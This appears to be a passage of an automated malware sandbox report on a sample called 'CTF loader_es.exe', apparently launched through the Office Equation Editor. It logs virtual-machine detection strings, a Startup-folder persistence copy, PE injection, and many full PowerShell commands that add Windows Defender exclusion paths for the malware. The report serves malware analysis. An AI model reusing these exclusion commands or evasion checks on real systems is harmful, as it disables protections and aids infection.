Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000007.00000002.2119619399.0000000000554000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: VMwareVBox
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Adds a directory exclusion to Windows DefenderShow sources
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeQueries volume information: C:\Users\user\AppData\Roaming\CTF loader_es.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
